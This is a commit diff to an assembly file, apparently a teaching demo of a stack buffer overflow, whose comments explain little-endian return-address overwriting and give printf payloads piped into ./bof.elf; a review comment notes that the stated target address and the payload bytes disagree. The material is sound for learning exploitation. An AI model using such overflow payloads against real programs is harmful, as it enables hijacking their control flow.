(docs): finish
parent
a896711866
commit
824a6a079d
13
bof.s
@ -49,14 +49,15 @@
# | x | x | x | x | x | x | x | x | 6a | 11 | 40 | 00 | <-- saved bp (1) | #
# |___|___|___|___|___|___|___|___|____|____|____|____|___________________| #
# #
# woohoo more information
# Since we don't really care what is in the memory where the x's are, we can put anything there. We want #
# to modify the base pointer, so we know that we want to replace the stored address 0x40116a. However, #
# since the binary is little endian (LSB), when we want to overwrite the memory, our input will have to #
# follow that format. Instead of writing {0x40, 0x10, 0x47} to stdin, we will write {0x47, 0x10, 0x40} to #
# be able to write 0x401047 (the address we want to jump to). #
#
#
#
#
# Allowing us to craft the final payload: "aaaaaaaa\x0\x0\x0\x0\x0\x0\x0\x0\x47\x10\x40". #
# This allows us to craft the final payload: "aaaaaaaaaaaaaaaa\x47\x11\x40". #
#---------------------------------------------------------------------------------------------------------------#
# Execution: bash -c 'printf "aaaaaaaa\x0\x0\x0\x0\x0\x0\x0\x0\x47\x10\x40" | ./bof.elf' #
# Execution: bash -c 'printf "aaaaaaaaaaaaaaaa\x47\x11\x40" | ./bof.elf' #
#---------------------------------------------------------------#-----------------------------------------------#
nop # #
leave # END OF FUNCTION #
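
Review bot: The explanatory comment and the sixteen-'a' payload disagree on the target address. The comment says the input must be {0x47, 0x10, 0x40} to write 0x401047, but the payload and the matching Execution line end in \x47\x11\x40, which in little-endian order is 0x401147. One of the two is a typo; make the comment and the payload name the same address so a reader can check the bytes against the text. The comment also says the goal is "to modify the base pointer" while describing 0x401047 as "the address we want to jump to", so it would help to state explicitly which saved value the three bytes land on and that the fourth byte of the stored value (00 in the diagram row) is left untouched because only three bytes follow the filler.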